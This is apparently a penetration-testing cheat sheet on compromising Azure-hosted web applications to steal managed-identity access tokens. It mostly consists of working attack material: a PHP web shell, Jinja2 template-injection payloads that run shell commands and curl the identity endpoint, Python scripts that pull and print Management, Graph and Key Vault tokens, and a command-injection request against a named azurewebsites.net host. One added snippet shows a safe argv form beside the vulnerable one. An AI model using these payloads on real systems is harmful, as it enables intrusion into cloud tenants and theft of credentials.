Abuse Public Web-Application

The usual goal is an access token for the application's managed identity. The local token endpoint, and the secret that every request to it must carry, are exposed to the application through two environment variables:

  • IDENTITY_ENDPOINT
  • IDENTITY_HEADER

Insecure File Upload

Upload a simple web command shell like:

<?php 
system($_REQUEST['cmd']);
?>

or directly try to steal a token, e.g., through:

<?php 
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>

SSTI

Payloads to try in input fields, in escalating order. If {{ 7*7 }} comes back as 49 the input is being rendered as a Jinja2 template; config is Flask's config object, from which os is reachable:

{{ 7*7 }}
{{ config.items() }}
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
{{config.__class__.__init__.__globals__['os'].popen('env').read()}}
{{config.__class__.__init__.__globals__['os'].popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()}}
 
# Key Vault needs its own token, issued for the vault.azure.net resource instead of management.azure.com:
{{config.__class__.__init__.__globals__['os'].popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()}}

OS Command Injection

If you have command execution, drop a small script that pulls the needed access tokens, e.g. in Python (the 2017-09-01 api-version expects the IDENTITY_HEADER value in a request header named secret):

import os
import json

# Both values are injected into the app's environment by the platform
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']


def get_token(resource):
    # -s keeps curl's progress meter out of the output; the JSON is parsed once
    cmd = 'curl -s "%s?resource=%s&api-version=2017-09-01" -H secret:%s' % (
        IDENTITY_ENDPOINT, resource, IDENTITY_HEADER)
    return json.loads(os.popen(cmd).read())


for name, resource in [("Management API", "https://management.azure.com/"),
                       ("Graph API", "https://graph.microsoft.com/")]:
    val = get_token(resource)
    print("\r\n[+] " + name)
    print("Access Token: " + val["access_token"])
    print("ClientID: " + val["client_id"])
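A standalone variant of the token fetcher, added here as an example and not part of the original notes. It does not depend on curl being present, builds the request for either api-version (the currently documented 2019-08-01 form sends the secret in an X-IDENTITY-HEADER header, the 2017-09-01 form used above sends it in a header named secret), and decodes the JWT payload so you can check which identity (tid/oid/appid), audience and expiry you actually obtained before spending the token. make_unsigned_jwt and the claims used with it are constructed purely for offline demonstration; the endpoint and secret are read from the same environment variables as above.

```python
import base64
import json
import os
import urllib.parse
import urllib.request
from datetime import datetime, timezone

# Header name depends on the api-version: the documented form (2019-08-01)
# uses X-IDENTITY-HEADER, the older form used in the notes above uses 'secret'.
HEADER_BY_API_VERSION = {
    "2019-08-01": "X-IDENTITY-HEADER",
    "2017-09-01": "secret",
}

# Resources worth asking for; each needs its own token.
RESOURCES = {
    "Management API": "https://management.azure.com/",
    "Graph API": "https://graph.microsoft.com/",
    "Key Vault": "https://vault.azure.net",
}


def token_request(endpoint, header_value, resource, api_version="2019-08-01"):
    """Build (url, headers) for the local managed-identity token endpoint."""
    query = urllib.parse.urlencode({"resource": resource, "api-version": api_version})
    return endpoint + "?" + query, {HEADER_BY_API_VERSION[api_version]: header_value}


def fetch_token(resource, api_version="2019-08-01"):
    """Call the endpoint from inside the app; needs IDENTITY_ENDPOINT/IDENTITY_HEADER."""
    url, headers = token_request(os.environ["IDENTITY_ENDPOINT"],
                                 os.environ["IDENTITY_HEADER"], resource, api_version)
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def _b64url_decode(data):
    # JWT segments are base64url without padding; restore it before decoding
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def jwt_claims(token):
    """Decode a JWT payload without verifying the signature (inspection only)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    return json.loads(_b64url_decode(parts[1]))


def summarize(token_response):
    """Report who the token is for and how long it is valid."""
    claims = jwt_claims(token_response["access_token"])
    expires = datetime.fromtimestamp(int(claims["exp"]), tz=timezone.utc)
    return {
        "aud": claims.get("aud"),
        "tid": claims.get("tid"),
        "oid": claims.get("oid"),
        "appid": claims.get("appid"),
        "expires": expires.isoformat(),
        "client_id": token_response.get("client_id"),
    }


def make_unsigned_jwt(claims):
    """Constructed helper for offline testing: an unsigned JWT carrying `claims`."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")
    return enc({"alg": "none", "typ": "JWT"}) + "." + enc(claims) + "."


if __name__ == "__main__":
    for name, resource in RESOURCES.items():
        try:
            print("[+]", name, summarize(fetch_token(resource)))
        except (KeyError, OSError, ValueError) as err:  # missing env var, HTTP/URL error, bad body
            print("[-]", name, "failed:", err)
```

Run it the same way as the curl script; the summary line tells you immediately whether the token is scoped to the resource you asked for and which service principal it represents.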
  • wrap the script invocation in ; ... ; when triggering it through the injectable parameter: the leading ; terminates the application's own command and the trailing ; detaches anything the application appends after the parameter from our command (whether both are needed depends upon the web application):
(Invoke-WebRequest -UseBasicParsing -Uri "https://processfile.azurewebsites.net/api/HttpTrigger1?server=;python /tmp/uploads/student64/student64.py;").Content
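Why both semicolons matter, as an added example that is not part of the original notes: a constructed stand-in for the vulnerable handler that interpolates the server parameter into a shell string, a tokenizer that shows how sh splits the result, and the fixed argv form beside it. The ping -c 1 ... > /dev/null template is an assumption standing in for whatever the real application runs after the parameter; the injected command is a harmless echo.

```python
import shlex
import subprocess

# Constructed stand-in for the target's handler: the 'server' parameter is
# interpolated into a shell string and the app discards the command's output.
COMMAND_TEMPLATE = "ping -c 1 {server} > /dev/null"


def vulnerable_command(server: str) -> str:
    """What the vulnerable app hands to /bin/sh via shell=True."""
    return COMMAND_TEMPLATE.format(server=server)


def safe_command(server: str) -> list:
    """Fixed form: an argv list with no shell, so ';' is just part of the hostname."""
    return ["ping", "-c", "1", server]


def shell_segments(cmd: str) -> list:
    """Split a command line at ';' the way sh does, returning one argv per command."""
    segments, current = [], []
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    for tok in lexer:
        if tok == ";":
            segments.append(current)
            current = []
        else:
            current.append(tok)
    segments.append(current)
    return segments


def run_vulnerable(server: str) -> str:
    """Execute the vulnerable form and return the stdout the attacker gets back."""
    proc = subprocess.run(vulnerable_command(server), shell=True,
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # Without the trailing ';' the app's own '> /dev/null' swallows our output;
    # with it, our command becomes its own statement and the redirect stands alone.
    for payload in (";echo INJECTED", ";echo INJECTED;"):
        print(repr(payload), "->", shell_segments(vulnerable_command(payload)))
        print("  stdout:", repr(run_vulnerable(payload)))
    print("safe argv:", safe_command(";echo INJECTED;"))
```

The same tokenizer view explains the rest of the syntax in the Invoke-WebRequest call: the entire string between the two semicolons is what ends up as your command, so spaces and paths inside it need no quoting beyond what the HTTP client itself requires.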